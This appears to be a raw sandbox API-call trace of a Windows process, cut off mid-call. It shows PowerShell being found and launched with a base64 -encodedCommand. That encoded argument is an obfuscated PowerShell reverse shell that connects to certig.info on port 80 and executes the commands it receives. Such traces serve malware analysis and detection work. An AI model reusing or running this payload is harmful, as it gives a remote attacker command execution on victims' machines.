	[0194.968] GetLastError () returned 0x2
	[0194.968] SetErrorMode (uMode=0x1) returned 0x1
	[0194.968] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.968] GetLastError () returned 0x2
	[0194.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.969] GetLastError () returned 0x2
	[0194.969] SetErrorMode (uMode=0x1) returned 0x1
	[0194.969] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.969] GetLastError () returned 0x2
	[0194.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.969] GetLastError () returned 0x2
	[0194.969] SetErrorMode (uMode=0x1) returned 0x1
	[0194.969] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.969] GetLastError () returned 0x2
	[0194.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.969] GetLastError () returned 0x2
	[0194.970] SetErrorMode (uMode=0x1) returned 0x1
	[0194.970] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.970] GetLastError () returned 0x2
	[0194.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.970] GetLastError () returned 0x2
	[0194.970] SetErrorMode (uMode=0x1) returned 0x1
	[0194.970] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.970] GetLastError () returned 0x2
	[0194.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.971] GetLastError () returned 0x2
	[0194.971] SetErrorMode (uMode=0x1) returned 0x1
	[0194.971] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.971] GetLastError () returned 0x2
	[0194.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.971] GetLastError () returned 0x2
	[0194.971] SetErrorMode (uMode=0x1) returned 0x1
	[0194.971] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.971] GetLastError () returned 0x2
	[0194.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.971] GetLastError () returned 0x2
	[0194.971] SetErrorMode (uMode=0x1) returned 0x1
	[0194.972] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.972] GetLastError () returned 0x2
	[0194.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.972] GetLastError () returned 0x2
	[0194.972] SetErrorMode (uMode=0x1) returned 0x1
	[0194.972] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.972] GetLastError () returned 0x2
	[0194.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.973] GetLastError () returned 0x2
	[0194.973] SetErrorMode (uMode=0x1) returned 0x1
	[0194.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.973] GetLastError () returned 0x2
	[0194.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.973] GetLastError () returned 0x2
	[0194.973] SetErrorMode (uMode=0x1) returned 0x1
	[0194.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.974] GetLastError () returned 0x2
	[0194.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.974] GetLastError () returned 0x2
	[0194.974] SetErrorMode (uMode=0x1) returned 0x1
	[0194.974] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.974] GetLastError () returned 0x2
	[0194.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.974] GetLastError () returned 0x2
	[0194.974] SetErrorMode (uMode=0x1) returned 0x1
	[0194.975] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.975] GetLastError () returned 0x2
	[0194.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.975] GetLastError () returned 0x2
	[0194.975] SetErrorMode (uMode=0x1) returned 0x1
	[0194.975] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.975] GetLastError () returned 0x2
	[0194.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0194.975] GetLastError () returned 0x2
	[0194.975] SetErrorMode (uMode=0x1) returned 0x1
	[0194.976] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x60ff2d0
	[0194.976] GetLastError () returned 0x2
	[0194.978] FindNextFileW (in: hFindFile=0x60ff2d0, lpFindFileData=0x3a12d0 | out: lpFindFileData=0x3a12d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0194.978] GetLastError () returned 0x12
	[0194.978] FindClose (in: hFindFile=0x60ff2d0 | out: hFindFile=0x60ff2d0) returned 1
	[0194.978] SetErrorMode (uMode=0x1) returned 0x1
	[0194.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5e4ebac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0194.980] GetLastError () returned 0x12
	[0194.980] SetErrorMode (uMode=0x1) returned 0x1
	[0194.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x5e4f02c | out: lpFileInformation=0x5e4f02c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800)) returned 1
	[0194.980] GetLastError () returned 0x12
	[0194.980] SetErrorMode (uMode=0x1) returned 0x1
	[0194.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0194.982] GetLastError () returned 0xcb
	[0194.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0194.996] GetLastError () returned 0xcb
	[0195.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.494] GetLastError () returned 0xcb
	[0195.690] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x332a00, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x332a00) returned 0x4550
	[0195.706] GetConsoleWindow () returned 0x4015e
	[0195.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.714] GetLastError () returned 0xcb
	[0195.715] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.715] GetLastError () returned 0x0
	[0195.733] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.733] GetLastError () returned 0x0
	[0195.865] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGcARABpAHQARgA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABOAFQAawBiAHQAPQAoACQAZwBEAGkAdABGAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABwAG8ASAB6AFkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABnAG0AQwB3AGQAPQAkAE4AVABrAGIAdAAuAFIAZQBhAGQAKAAkAHAAbwBIAHoAWQAsADAALAAkAHAAbwBIAHoAWQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGkAUABCAFoAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcABvAEgAegBZACwAMAAsACQAZwBtAEMAdwBkACkAOwAkAG4ATgBvAHQAbgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAaQBQAEIAWgBtACAAMgA+ACYAMQApACkAOwAkAE4AVABrAGIAdAAuAFcAcgBpAHQAZQAoACQAbgBOAG8AdABuACwAMAAsACQAbgBOAG8AdABuAC4ATABlAG4AZwB0AGgAKQA7ACQATgBUAGsAYgB0AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABnAEQAaQB0AEYALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwBEAGkAdABGAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x5e4f11c | out: pNumArgs=0x5e4f11c) returned 0x60ecd40*=""
	[0195.865] GetLastError () returned 0x0
	[0195.865] lstrlenW (lpString="-encodedCommand") returned 15
	[0195.865] RtlMoveMemory (in: Destination=0x332a00, Source=0x60ecd52, Length=0x20 | out: Destination=0x332a00) 
	[0195.865] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGcARABpAHQARgA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABOAFQAawBiAHQAPQAoACQAZwBEAGkAdABGAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABwAG8ASAB6AFkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABnAG0AQwB3AGQAPQAkAE4AVABrAGIAdAAuAFIAZQBhAGQAKAAkAHAAbwBIAHoAWQAsADAALAAkAHAAbwBIAHoAWQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGkAUABCAFoAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcABvAEgAegBZACwAMAAsACQAZwBtAEMAdwBkACkAOwAkAG4ATgBvAHQAbgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAaQBQAEIAWgBtACAAMgA+ACYAMQApACkAOwAkAE4AVABrAGIAdAAuAFcAcgBpAHQAZQAoACQAbgBOAG8AdABuACwAMAAsACQAbgBOAG8AdABuAC4ATABlAG4AZwB0AGgAKQA7ACQATgBUAGsAYgB0AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABnAEQAaQB0AEYALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwBEAGkAdABGAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0195.865] RtlMoveMemory (in: Destination=0x3a12d0, Source=0x60ecd72, Length=0xd92 | out: Destination=0x3a12d0) 
	[0195.866] LocalFree (hMem=0x60ecd40) returned 0x0
	[0195.868] GetConsoleTitleW (in: lpConsoleTitle=0x3a12d0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0195.868] GetLastError () returned 0x0
	[0195.874] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGcARABpAHQARgA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABOAFQAawBiAHQAPQAoACQAZwBEAGkAdABGAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABwAG8ASAB6AFkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABnAG0AQwB3AGQAPQAkAE4AVABrAGIAdAAuAFIAZQBhAGQAKAAkAHAAbwBIAHoAWQAsADAALAAkAHAAbwBIAHoAWQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGkAUABCAFoAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcABvAEgAegBZACwAMAAsACQAZwBtAEMAdwBkACkAOwAkAG4ATgBvAHQAbgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAaQBQAEIAWgBtACAAMgA+ACYAMQApACkAOwAkAE4AVABrAGIAdAAuAFcAcgBpAHQAZQAoACQAbgBOAG8AdABuACwAMAAsACQAbgBOAG8AdABuAC4ATABlAG4AZwB0AGgAKQA7ACQATgBUAGsAYgB0AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABnAEQAaQB0AEYALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwBEAGkAdABGAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x332a18*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 